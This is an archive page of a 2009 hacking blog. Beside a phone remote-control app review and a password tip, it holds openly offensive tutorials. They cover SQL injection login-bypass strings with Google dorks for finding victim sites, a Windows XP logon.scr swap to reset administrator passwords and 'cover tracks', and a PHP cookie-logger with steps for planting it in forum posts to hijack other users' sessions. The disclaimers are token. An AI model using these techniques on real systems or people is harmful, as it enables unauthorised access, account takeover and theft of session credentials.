HACK3R'S LOUNGE: 2009

Monday, December 14, 2009

Remotely Control Your Phone from Computer

Today I will show you a really cool application for your mobile phone. It is Remote Professional from mobileways.de.
With Remote Professional you can remotely control your smart mobile phone from your computer desktop using the mouse and keyboard!
Not even can be remotely controlled but you can record video or take screenshots and save them to your computer.

It is a really nice sensation to see the phone desktop on your computer and browse the mobile internet from PC keyboard, or write and send SMS or make calls

It is very easy to install and use, just install the PC application (.exe) on your computer and then transfer (.sis) or (.sisx) file on your device and install it from there. You can install using your device’s PC Suiteapplication as well.
Now that you have install the pc and mobile application, run the application on your computer first and configure the serial ports from File > Setup > Bluetoth & Serial Ports
Here is a demo video from youtube.

Remote Professional runs on any S60 3rd Edition, S60 5th Edition, Series 60 v1/v2 or UIQ 3 phone and is compatible with Windows 2000, XP and Vista!
Remote Professional can be downloaded from here:
Remote Professional (2.2 MB)
Enjoy !!!

Saturday, December 12, 2009

List of all the SQL Injection Strings

One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems .

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

Happy Hunting

Hack Proof Passwords

Today I am going to teach you an incredibly useful skill. How to make Hack Proof Passwords.
Things that make a good password:

Easy To Remember.
No use having the thing if you can’t even remember it.
Long Long Long!
If it is not long, people will be able to Brute Force it.
Combinations of Numbers, Letters, Symbols.
Again due to brute forcing.
Difficult to guess.
If you make it your wife’s name. People are going to get it.
Unique
Every site should have a different password.

Now I have a real quick and easy method for making passwords that solve all of those problems. Furthermore these passwords will be drunk proof. In other words, no one will be able to accidentally trick you into telling them yoru password.
How to make the password:

What is the name of the Website?
Hungry Hackers.
Write the name of the website backwards.
srekcaH yrgnuH
Perfoms a Rotate 13 on the string. (This means to change the letter 13 places ahead. a becomes n, r becomes e, etc.)
ferxpnU letahU
Replace all of the letters with 1337 counterparts.
f3rxp/\/|_| 13tah|_|
Interleave your username into it.
fZ3erlxlpf/a\z/e|@_y|a h1o3ot.acho|m_|

Easy for you to figure out your password. You simply repeat the 5 steps for a website. There is no way anyone is ever going to guess that password. And further more, there is no way your going to tell someone your password because even you don’t know what it is off the top of your head.
This formula could very easily be made more complicated or simplier. Once you have the general idea of what your doing you can make good passwords in no time.
Love,
Haxor ~Zell Faze~
<3

Thursday, October 22, 2009

How to Hack Windows XP Admin Password

Disclaimer : The trick here explained it for educational purpose only & not to perform illegal or criminal activities. Don’t forget hacking into some one’s privacy is considered as crime. SO do it on your home network that you own or something. We are not responsible for anything you do & consequences of it by using our articles.

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos

Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.

Once this happens if you enter this command :

net user password

If the Administrator Account is called Frank and you want the password blah enter this

net user Frank blah

and this changes the password on franks machine to blah and your in.

Have Fun!

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Create a CookieLogger and Hack any Account

(Don’t Forget to read our disclaimer at the bottom of the post.)

Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.
What is a CookieLogger?
A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …
Step 1: Save the notepad file from the link below and Rename it as Fun.gif:

Download it.

Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:

$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

Step 3: Create a new Notepad File and Save it as logfile.txt
Step 4: Upload this file to your server
cookielogger.php -> http://www.yoursite.com/cookielogger.php
logfile.txt -> http://www.yoursite.com/logfile.txt (chmod 777)
fun.gif -> http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support :

http://0fees.net

Step 5: Go to the victim forum and insert this code in the signature or a post :

Download it.

Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.
Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.
Note : Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.
Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only. …Disclaimer : The trick here explained it for educational purpose only & not to perform illegal or criminal activities. Don’t forget hacking into some one’s privacy is considered as crime. SO do it on your home network that you own or something. We are not responsible for anything you do & consequences of it by using our articles.

Thursday, October 15, 2009

Login & Password Script for your Sites

Script takes users to 2 different pages,
depends on whether the entered combination is correct or not...

*EXAMPLE: (user="free", password="ebook")

Directions to install above script:

Simply insert the below script in full into the section of your login page:

Configuring the script

To change the login/password, change "free" and "ebook" inside the script, respectively.
To change the destination URLs, modify "creativity.html" and "failure.html"